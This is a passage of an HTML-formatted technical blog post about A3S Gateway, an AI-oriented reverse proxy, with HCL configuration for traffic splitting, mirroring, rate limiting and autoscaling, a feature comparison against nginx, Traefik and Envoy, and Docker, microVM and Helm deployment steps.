  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Scale-up triggering uses Knative's formula:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Version Traffic Splitting and Automatic Rollback
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;revisions&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;traffic_percent&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;95&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://v1:8080"&lt;/span&gt; &lt;span class="p"&gt;}]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v2"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;traffic_percent&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://v2:8080"&lt;/span&gt; &lt;span class="p"&gt;}]&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;]&lt;/span&gt;

  &lt;span class="nx"&gt;rollout&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;from&lt;/span&gt;                 &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v1"&lt;/span&gt;
    &lt;span class="nx"&gt;to&lt;/span&gt;                   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"v2"&lt;/span&gt;
    &lt;span class="nx"&gt;step_percent&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;          &lt;span class="c1"&gt;# increase by 10% per step&lt;/span&gt;
    &lt;span class="nx"&gt;step_interval_secs&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt;          &lt;span class="c1"&gt;# one step every 60 seconds&lt;/span&gt;
    &lt;span class="nx"&gt;error_rate_threshold&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mf"&gt;0.05&lt;/span&gt;        &lt;span class="c1"&gt;# rollback if error rate exceeds 5%&lt;/span&gt;
    &lt;span class="nx"&gt;latency_threshold_ms&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5000&lt;/span&gt;        &lt;span class="c1"&gt;# rollback if p99 exceeds 5s&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Traffic splitting and rollback decisions close inside the gateway, without depending on an external control plane.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traffic Mirroring
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;mirror&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;service&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"llm-v2-shadow"&lt;/span&gt;  &lt;span class="c1"&gt;# shadow backend&lt;/span&gt;
    &lt;span class="nx"&gt;percentage&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;               &lt;span class="c1"&gt;# copy 10% of real requests&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="c1"&gt;# Mirroring is fire-and-forget:&lt;/span&gt;
  &lt;span class="c1"&gt;# - does not wait for the shadow backend response&lt;/span&gt;
  &lt;span class="c1"&gt;# - does not expose shadow backend errors to users&lt;/span&gt;
  &lt;span class="c1"&gt;# - mirror requests are sent asynchronously, no impact on primary path latency&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Passive Health Management
&lt;/h3&gt;

&lt;p&gt;Each backend instance has an independent error rate tracker. When an instance's error rate exceeds a threshold within a sliding window, it is marked unhealthy and removed from the load balancing pool. When the error rate recovers, it rejoins:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"llm-service"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;load_balancer&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;strategy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"least-connections"&lt;/span&gt;  &lt;span class="c1"&gt;# actively route to the least-loaded instance&lt;/span&gt;
    &lt;span class="nx"&gt;health_check&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;path&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/health"&lt;/span&gt;
      &lt;span class="nx"&gt;interval&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"10s"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;# Passive health checks are always on:&lt;/span&gt;
&lt;span class="c1"&gt;# 5 consecutive 5xx or timeouts → instance temporarily removed from load balancing&lt;/span&gt;
&lt;span class="c1"&gt;# 2 consecutive successes → instance rejoins&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  9. A Real Comparison With Existing Solutions
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;nginx&lt;/th&gt;
&lt;th&gt;Traefik&lt;/th&gt;
&lt;th&gt;Envoy&lt;/th&gt;
&lt;th&gt;A3S Gateway&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SSE zero-buffer&lt;/td&gt;
&lt;td&gt;Requires manual config, has pitfalls&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Native, architecture-level guarantee&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cold-start request buffering&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Version traffic splitting&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Requires Istio&lt;/td&gt;
&lt;td&gt;Yes (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Automatic rollback&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Requires external system&lt;/td&gt;
&lt;td&gt;Yes (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Traffic mirroring&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Passive health checks&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config hot reload&lt;/td&gt;
&lt;td&gt;No (requires process reload)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (zero downtime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment complexity&lt;/td&gt;
&lt;td&gt;Simple&lt;/td&gt;
&lt;td&gt;Simple&lt;/td&gt;
&lt;td&gt;Requires control plane&lt;/td&gt;
&lt;td&gt;Simple (single binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime dependencies&lt;/td&gt;
&lt;td&gt;OpenSSL&lt;/td&gt;
&lt;td&gt;Go runtime&lt;/td&gt;
&lt;td&gt;Dynamic linking&lt;/td&gt;
&lt;td&gt;None (statically linked Rust)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Envoy is technically the closest, but its hidden cost of use is high: you need a control plane (Istio, xDS API), you need Kubernetes, you need an engineer who understands the Envoy configuration model. For a team whose core business is AI inference, maintaining a full Service Mesh is extra cognitive overhead.&lt;/p&gt;

&lt;p&gt;A3S Gateway's design trade-off is: only do what an AI service traffic layer needs, fully described in an HCL config file, deployed as a single binary. No database, no control plane, no Kubernetes required (though supported).&lt;/p&gt;




&lt;h2&gt;
  
  
  10. In Practice: Configuring a Full Proxy for an AI Backend
&lt;/h2&gt;

&lt;p&gt;At this point we understand why an AI-native gateway is needed. Here is a complete real-world example: deploying A3S Gateway in front of an Ollama LLM service, covering authentication, rate limiting, circuit breaking, streaming, and autoscaling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Write gateway.hcl
&lt;/h3&gt;

&lt;p&gt;This config proxies a local Ollama instance and exposes it for external access. It adds JWT authentication, rate limiting at 60 requests per minute, a circuit breaker, and TLS termination:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# gateway.hcl&lt;/span&gt;

&lt;span class="c1"&gt;# ── Entrypoints ──────────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="s2"&gt;"web"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0:8080"&lt;/span&gt;   &lt;span class="c1"&gt;# HTTP (development / internal network)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="s2"&gt;"websecure"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0:443"&lt;/span&gt;    &lt;span class="c1"&gt;# HTTPS (production)&lt;/span&gt;
  &lt;span class="nx"&gt;tls&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;cert_file&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/etc/certs/fullchain.pem"&lt;/span&gt;
    &lt;span class="nx"&gt;key_file&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/etc/certs/privkey.pem"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ── Routers ───────────────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="c1"&gt;# /v1/** → Ollama (OpenAI-compatible API)&lt;/span&gt;
&lt;span class="nx"&gt;routers&lt;/span&gt; &lt;span class="s2"&gt;"llm-api"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;rule&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"PathPrefix(`/v1`)"&lt;/span&gt;
  &lt;span class="nx"&gt;service&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt;
  &lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"websecure"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;middlewares&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"jwt-auth"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"rate-limit"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"circuit-breaker"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# /ws/** → WebSocket real-time inference (Agent scenarios)&lt;/span&gt;
&lt;span class="nx"&gt;routers&lt;/span&gt; &lt;span class="s2"&gt;"llm-ws"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;rule&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"PathPrefix(`/ws`)"&lt;/span&gt;
  &lt;span class="nx"&gt;service&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt;
  &lt;span class="nx"&gt;entrypoints&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"websecure"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;middlewares&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"jwt-auth"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ── Backend Services ──────────────────────────────────────────────────────&lt;/span&gt;
&lt;span class="nx"&gt;services&lt;/span&gt; &lt;span class="s2"&gt;"ollama"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;load_balancer&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;strategy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"least-connections"&lt;/span&gt;   &lt;span class="c1"&gt;# prefer the instance with the lowest current load&lt;/span&gt;
    &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"http://127.0.0.1:11434"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;weight&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="nx"&gt;health_check&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;path&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/api/version"&lt;/span&gt;      &lt;span class="c1"&gt;# Ollama health endpoint&lt;/span&gt;
      &lt;span class="nx"&gt;interval&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"15s"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;}&lt;/p&gt;

&lt;p&gt;# Mirror 3% of real requests to the new model version for offline quality comparison&lt;br&gt;
  mirror {&lt;br&gt;
    service    = "ollama-next"&lt;br&gt;
    percentage = 3&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;# Autoscaling: scale to zero when idle, auto scale-up when requests arrive&lt;br&gt;
  scaling {&lt;br&gt;
    min_replicas          = 0        # allow scale-to-zero&lt;br&gt;
    max_replicas          = 4        # up to 4 parallel inference instances&lt;br&gt;
    container_concurrency = 4        # each instance handles at most 4 concurrent requests&lt;br&gt;
    target_utilization    = 0.7      # target utilization 70%&lt;br&gt;
    buffer_enabled        = true     # buffer requests during cold start, no 502&lt;br&gt;
    executor              = "box"    # A3S Box manages instance lifecycle&lt;br&gt;
  }&lt;br&gt;
}&lt;/p&gt;
&lt;h1&gt;
  
  
  Shadow backend: receives mirrored traffic, does not affect the primary path
&lt;/h1&gt;

&lt;p&gt;services "ollama-next" {&lt;br&gt;
  load_balancer {&lt;br&gt;
    strategy = "round-robin"&lt;br&gt;
    servers  = [{ url = "&lt;a href="http://127.0.0.1:11435" rel="noopener noreferrer"&gt;http://127.0.0.1:11435&lt;/a&gt;" }]&lt;br&gt;
  }&lt;br&gt;
}&lt;/p&gt;
&lt;h1&gt;
  
  
  ── Middlewares ───────────────────────────────────────────────────────────
&lt;/h1&gt;

&lt;p&gt;middlewares "jwt-auth" {&lt;br&gt;
  type  = "jwt"&lt;br&gt;
  value = "${JWT_SECRET}"            # read secret from environment variable&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;middlewares "rate-limit" {&lt;br&gt;
  type  = "rate-limit"&lt;br&gt;
  rate  = 60                         # 60 requests per minute (token bucket)&lt;br&gt;
  burst = 10                         # burst cap&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;middlewares "circuit-breaker" {&lt;br&gt;
  type              = "circuit-breaker"&lt;br&gt;
  failure_threshold = 3              # 3 consecutive failures → open circuit&lt;br&gt;
  cooldown_secs     = 30             # enter half-open state after 30 seconds&lt;br&gt;
  success_threshold = 2              # 2 successes → close circuit, resume normal&lt;br&gt;
}&lt;/p&gt;
&lt;h1&gt;
  
  
  ── Config Hot Reload ─────────────────────────────────────────────────────
&lt;/h1&gt;

&lt;p&gt;providers {&lt;br&gt;
  file {&lt;br&gt;
    watch     = true                 # auto-reload on file change, no restart needed&lt;br&gt;
    directory = "/etc/gateway/conf.d/"&lt;br&gt;
  }&lt;br&gt;
}&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Save as , then:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
a3s-gateway --config gateway.hcl&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The gateway starts listening immediately, and any changes to the config file take effect within milliseconds.

---

### Step 2: Package as a Docker Image

If you want to package the gateway into a container (rather than using the Homebrew-installed binary directly), use the Dockerfile below. Note it is a two-stage build — the compile stage uses the Rust toolchain, the runtime stage only needs an Alpine base image:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
dockerfile&lt;/p&gt;
&lt;h1&gt;
  
  
  ── Build stage ───────────────────────────────────────────────────────────
&lt;/h1&gt;

&lt;p&gt;FROM rust:alpine AS builder&lt;/p&gt;

&lt;p&gt;RUN apk add --no-cache musl-dev cmake make perl g++ linux-headers&lt;/p&gt;

&lt;p&gt;WORKDIR /build&lt;/p&gt;
&lt;h1&gt;
  
  
  Copy Cargo manifests first to warm the dependency cache (layer cache optimization)
&lt;/h1&gt;

&lt;p&gt;COPY Cargo.toml Cargo.lock ./&lt;br&gt;
RUN mkdir -p src &amp;amp;&amp;amp; echo 'fn main(){}' &amp;gt; src/main.rs &amp;amp;&amp;amp; touch src/lib.rs     &amp;amp;&amp;amp; cargo build --release 2&amp;gt;/dev/null || true     &amp;amp;&amp;amp; rm -rf src&lt;/p&gt;
&lt;h1&gt;
  
  
  Copy real source and build
&lt;/h1&gt;

&lt;p&gt;COPY src/ src/&lt;br&gt;
RUN touch src/main.rs src/lib.rs &amp;amp;&amp;amp; cargo build --release&lt;/p&gt;
&lt;h1&gt;
  
  
  ── Runtime stage ─────────────────────────────────────────────────────────
&lt;/h1&gt;

&lt;p&gt;FROM alpine:3&lt;/p&gt;

&lt;p&gt;RUN apk add --no-cache ca-certificates tzdata     &amp;amp;&amp;amp; addgroup -S gateway &amp;amp;&amp;amp; adduser -S gateway -G gateway&lt;/p&gt;

&lt;p&gt;COPY --from=builder /build/target/release/a3s-gateway /usr/local/bin/a3s-gateway&lt;br&gt;
COPY gateway.hcl /etc/a3s-gateway/gateway.hcl&lt;/p&gt;

&lt;p&gt;USER gateway&lt;/p&gt;

&lt;p&gt;EXPOSE 8080 443&lt;/p&gt;

&lt;p&gt;ENTRYPOINT ["a3s-gateway", "--config", "/etc/a3s-gateway/gateway.hcl"]&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Build and run:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
bash&lt;br&gt;
docker build -t my-llm-gateway:latest .&lt;/p&gt;

&lt;p&gt;docker run -d   -p 8080:8080   -p 443:443   -v $(pwd)/certs:/etc/certs:ro   -e JWT_SECRET=your-secret   my-llm-gateway:latest&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
The final image is about 12 MB with no runtime dependencies.

---

### Step 3: Deploy With A3S Box (Single-Machine Sandbox)

[A3S Box](https://github.com/A3S-Lab/Box) is a microVM-based sandbox runtime. In scenarios where a full Kubernetes cluster is not needed — such as edge nodes, development machines, or resource-constrained single servers — Box can replace Docker Compose to manage the lifecycle of the gateway and LLM instances.

Box configuration is also HCL. Create :

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
hcl&lt;/p&gt;
&lt;h1&gt;
  
  
  box.hcl — run gateway + Ollama in microVM sandboxes
&lt;/h1&gt;

&lt;p&gt;workloads "gateway" {&lt;br&gt;
  binary = "/usr/local/bin/a3s-gateway"&lt;br&gt;
  args   = ["--config", "/etc/gateway/gateway.hcl"]&lt;/p&gt;

&lt;p&gt;resources {&lt;br&gt;
    memory_mb = 512&lt;br&gt;
    cpus      = 2&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;ports = [8080, 443]&lt;/p&gt;

&lt;p&gt;env = {&lt;br&gt;
    JWT_SECRET = "${JWT_SECRET}"&lt;br&gt;
    RUST_LOG   = "info,a3s_gateway=debug"&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;mounts {&lt;br&gt;
    host     = "./gateway.hcl"&lt;br&gt;
    guest    = "/etc/gateway/gateway.hcl"&lt;br&gt;
    readonly = true&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;mounts {&lt;br&gt;
    host     = "./certs"&lt;br&gt;
    guest    = "/etc/certs"&lt;br&gt;
    readonly = true&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;# Auto-restart if the gateway process crashes&lt;br&gt;
  restart = "always"&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;workloads "ollama" {&lt;br&gt;
  binary = "/usr/local/bin/ollama"&lt;br&gt;
  args   = ["serve"]&lt;/p&gt;

&lt;p&gt;resources {&lt;br&gt;
    memory_mb = 8192    # a 7B quantized model needs about 6 GB&lt;br&gt;
    cpus      = 4&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;ports = [11434]&lt;/p&gt;

&lt;p&gt;env = {&lt;br&gt;
    OLLAMA_MODELS = "/models"&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;mounts {&lt;br&gt;
    host  = "/data/models"&lt;br&gt;
    guest = "/models"&lt;br&gt;
  }&lt;br&gt;
}&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Start:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
bash&lt;/p&gt;
&lt;h1&gt;
  
  
  Install A3S Box
&lt;/h1&gt;

&lt;p&gt;brew install a3s-lab/tap/a3s-box&lt;/p&gt;
&lt;h1&gt;
  
  
  Start all workloads
&lt;/h1&gt;

&lt;p&gt;a3s-box run --config box.hcl&lt;/p&gt;
&lt;h1&gt;
  
  
  Check status
&lt;/h1&gt;

&lt;p&gt;a3s-box status&lt;/p&gt;
&lt;h1&gt;
  
  
  View gateway logs
&lt;/h1&gt;

&lt;p&gt;a3s-box logs gateway&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Box's microVM isolation means: even if Ollama crashes due to OOM, the gateway process is unaffected — it triggers cold-start buffering, waits for Box to restart Ollama, then replays the queued requests.

---

### Step 4: Deploy to Kubernetes With Helm

For production environments requiring high availability and horizontal scaling, the Helm chart is the recommended deployment method.

Prepare  with the full HCL config embedded:

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;br&gt;
yaml&lt;/p&gt;
&lt;h1&gt;
  
  
  values-prod.yaml
&lt;/h1&gt;

&lt;p&gt;image:&lt;br&gt;
  repository: ghcr.io/a3s-lab/gateway&lt;br&gt;
  tag: "0.2.2"&lt;br&gt;
  pullPolicy: Always&lt;/p&gt;

&lt;p&gt;replicaCount: 2          # run 2 gateway replicas for high availability&lt;/p&gt;

&lt;p&gt;service:&lt;br&gt;
  type: LoadBalancer     # cloud provider LB, or pair with ingress-nginx&lt;br&gt;
  port: 8080&lt;/p&gt;

&lt;p&gt;config: |&lt;br&gt;
  entrypoints "web" {&lt;br&gt;
    address = "0.0.0.0:8080"&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;routers "llm-api" {&lt;br&gt;
    rule        = "PathPrefix(&lt;code&gt;/v1&lt;/code&gt;)"&lt;br&gt;
    service     = "ollama"&lt;br&gt;
    middlewares = ["jwt-auth", "rate-limit", "circuit-breaker"]&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;services "ollama" {&lt;br&gt;
    load_balancer {&lt;br&gt;
      strategy = "least-connections"&lt;br&gt;
      servers  = [&lt;br&gt;
        { url = "&lt;a href="http://ollama-svc.ai.svc.cluster.local:11434" rel="noopener noreferrer"&gt;http://ollama-svc.ai.svc.cluster.local:11434&lt;/a&gt;" },&lt;br&gt;
      ]&lt;br&gt;
      health_check {&lt;br&gt;
        path     = "/api/version"&lt;br&gt;
        interval = "15s"&lt;br&gt;
      }&lt;br&gt;
    }&lt;br&gt;
    scaling {&lt;br&gt;
      min_replicas          = 0&lt;br&gt;
      max_replicas          = 4&lt;br&gt;
      container_concurrency = 4&lt;br&gt;
      target_utilization    = 0.7&lt;br&gt;
      buffer_enabled        = true&lt;br&gt;
      executor              = "kube"   # use kube executor to manage Pod replicas in K8s&lt;br&gt;
    }&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;middlewares "jwt-auth" {&lt;br&gt;
    type  = "jwt"&lt;br&gt;
    value = "${JWT_SECRET}"&lt;br&gt;
  }&lt;/p&gt;

